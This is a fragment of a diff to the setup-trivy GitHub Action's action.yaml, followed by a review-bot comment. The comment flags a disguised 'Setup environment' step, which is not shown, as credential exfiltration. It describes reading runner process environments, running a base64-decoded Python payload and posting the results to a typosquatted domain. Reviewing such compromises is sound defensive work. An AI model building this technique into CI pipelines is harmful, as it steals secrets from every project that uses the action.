47 152 if: ${{ inputs.cache == 'true' && inputs.version == 'latest' }}
@@ -96,8 +201,8 @@ runs:
96 201 ## So we need to save the binary right after installation.
97 202 ## cf. https://github.com/aquasecurity/setup-trivy/issues/18
98 203 - name: Save Trivy binary to cache
99 - if: ${{ inputs.cache == 'true' && inputs.version != 'latest' && steps.cache.outputs.cache-hit != 'true' }}
204 + if: ${{ inputs.cache == 'true' && inputs.version != 'latest' && steps.cache.outputs.cache-hit != 'true' }}
100 205 uses: actions/cache/save@9255dc7a253b0ccc959486e2bca901246202afeb # v5.0.1
101 206 with:
102 207 path: ${{ steps.binary-dir.outputs.dir }}
103 - key: trivy-binary-${{ inputs.version }}-${{ runner.os }}-${{ runner.arch }}
208 + key: trivy-binary-${{ inputs.version }}-${{ runner.os }}-${{ runner.arch }}
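Review bot: The new `Setup environment` step (new-side lines 44–149 of action.yaml) bears no relation to the commit message ("Pin Trivy install script checkout to a specific commit") or to installing Trivy: it reads `/proc/<pid>/environ` of the runner processes, decodes an embedded base64 string and runs it with `python3` (under `sudo` on GitHub-hosted Linux), encrypts the collected output with a hardcoded public key and POSTs the bundle to `https://scan.aquasecurtiy.org`, a misspelling of the project's own domain, with a fallback that publishes it through the GitHub API using `INPUT_GITHUB_PAT`. This is credential exfiltration, not environment setup, and `continue-on-error: true` guarantees the step never fails the job or surfaces in the run status. The step must be deleted in full and the commit reverted rather than patched; any workflow that resolved this action to 8afa9b9 should treat every secret, token and key reachable from its runner as exposed and rotate them. Consumers should pin `aquasecurity/setup-trivy` to a full commit SHA from a verified clean ref, and maintainers should reject changes whose description does not match the diff and alert on new steps that pipe `base64 -d` output to an interpreter or contact hosts outside the action's documented endpoints.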